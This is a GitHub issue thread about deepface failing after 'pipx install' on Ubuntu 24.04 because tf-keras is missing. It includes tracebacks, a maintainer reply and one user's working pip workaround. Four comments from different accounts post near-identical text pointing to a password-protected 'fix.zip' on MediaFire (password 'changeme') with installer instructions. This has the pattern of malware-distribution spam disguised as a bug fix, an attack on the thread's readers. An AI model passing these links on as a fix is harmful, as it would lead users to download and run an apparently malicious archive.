### ISSUE TITLE
[FEATURE]: support pipx install on Ubuntu 24.04, fails with "ValueError: You have tensorflow 2.17.0 and this requires tf-keras package. Please run `pip install tf-keras` or downgrade your tensorflow"

### ISSUE THREAD

**Issue by cirosantilli** [serengil/deepface#1323]
### Description

It would be good if `pipx install` worked for Ubuntu 24.04:

```
pipx install deepface==0.0.93
```

but then:

```
deepface help
```

blows up with:

```
2024-08-27_21-42-31@ciro@ciro-p14s$ deepface help                                                                                                          
2024-08-27 21:42:38.810014: I tensorflow/core/util/port.cc:153] oneDNN custom operations are on. You may see slightly different numerical results due to fl
oating-point round-off errors from different computation orders. To turn them off, set the environment variable `TF_ENABLE_ONEDNN_OPTS=0`.                 
2024-08-27 21:42:38.810549: I external/local_xla/xla/tsl/cuda/cudart_stub.cc:32] Could not find cuda drivers on your machine, GPU will not be used.        
2024-08-27 21:42:38.814904: I external/local_xla/xla/tsl/cuda/cudart_stub.cc:32] Could not find cuda drivers on your machine, GPU will not be used.        
2024-08-27 21:42:38.822156: E external/local_xla/xla/stream_executor/cuda/cuda_fft.cc:485] Unable to register cuFFT factory: Attempting to register factory
 for plugin cuFFT when one has already been registered                                                                                                     
2024-08-27 21:42:38.834452: E external/local_xla/xla/stream_executor/cuda/cuda_dnn.cc:8454] Unable to register cuDNN factory: Attempting to register factor
y for plugin cuDNN when one has already been registered
2024-08-27 21:42:38.837693: E external/local_xla/xla/stream_executor/cuda/cuda_blas.cc:1452] Unable to register cuBLAS factory: Attempting to register fact
ory for plugin cuBLAS when one has already been registered                                                                                                 
2024-08-27 21:42:38.846987: I tensorflow/core/platform/cpu_feature_guard.cc:210] This TensorFlow binary is optimized to use available CPU instructions in p
erformance-critical operations.                                              
To enable the following instructions: AVX2 AVX512F AVX512_VNNI AVX512_BF16 FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags
.                                                                            
2024-08-27 21:42:39.511588: W tensorflow/compiler/tf2tensorrt/utils/py_utils.cc:38] TF-TRT Warning: Could not find TensorRT
Traceback (most recent call last):                                                                                                                         
  File "/home/ciro/.local/pipx/venvs/deepface/lib/python3.12/site-packages/retinaface/commons/package_utils.py", line 19, in validate_for_keras3
    import tf_keras                                                          
ModuleNotFoundError: No module named 'tf_keras'           
                                                                             
The above exception was the direct cause of the following exception:
                                                                                                                                                           
Traceback (most recent call last):                                           
  File "/home/ciro/.local/bin/deepface", line 5, in <module> 
    from deepface.DeepFace import cli                                        
  File "/home/ciro/.local/pipx/venvs/deepface/lib/python3.12/site-packages/deepface/DeepFace.py", line 20, in <module>
    from deepface.modules import (                                                                                                                         
  File "/home/ciro/.local/pipx/venvs/deepface/lib/python3.12/site-packages/deepface/modules/modeling.py", line 16, in <module>
    from deepface.models.face_detection import (
  File "/home/ciro/.local/pipx/venvs/deepface/lib/python3.12/site-packages/deepface/models/face_detection/RetinaFace.py", line 3, in <module>
    from retinaface import RetinaFace as rf        
  File "/home/ciro/.local/pipx/venvs/deepface/lib/python3.12/site-packages/retinaface/RetinaFace.py", line 20, in <module>
    package_utils.validate_for_keras3()                                                                                                                    
  File "/home/ciro/.local/pipx/venvs/deepface/lib/python3.12/site-packages/retinaface/commons/package_utils.py", line 24, in validate_for_keras3
    raise ValueError(                                                        
ValueError: You have tensorflow 2.17.0 and this requires tf-keras package. Please run `pip install tf-keras` or downgrade your tensorflow.
```

And you can't just:

```
pip install tf-keras
```

because it blows up with:

```
error: externally-managed-environment

× This environment is externally managed
╰─> To install Python packages system-wide, try apt install
    python3-xyz, where xyz is the package you are trying to
    install.
    
    If you wish to install a non-Debian-packaged Python package,
    create a virtual environment using python3 -m venv path/to/venv.
    Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make
    sure you have python3-full installed.
    
    If you wish to install a non-Debian packaged Python application,
    it may be easiest to use pipx install xyz, which will manage a
    virtual environment for you. Make sure you have pipx installed.
    
    See /usr/share/doc/python3.12/README.venv for more information.

note: If you believe this is a mistake, please contact your Python installation or OS distribution provider. You can override this, at the risk of breaking your Python installation or OS, by passing --break-system-packages.
hint: See PEP 668 for the detailed specification.
```

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by serengil** [comment]
Unfortunately, tf_keras is s must dependency for that tf version. You may consider to raise a ticket in tf repo instead deepface if you cannot install it.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Anandesh-Sharma** [comment]
`pip install tf_keras` works for me on 2.17.0 @cirosantilli
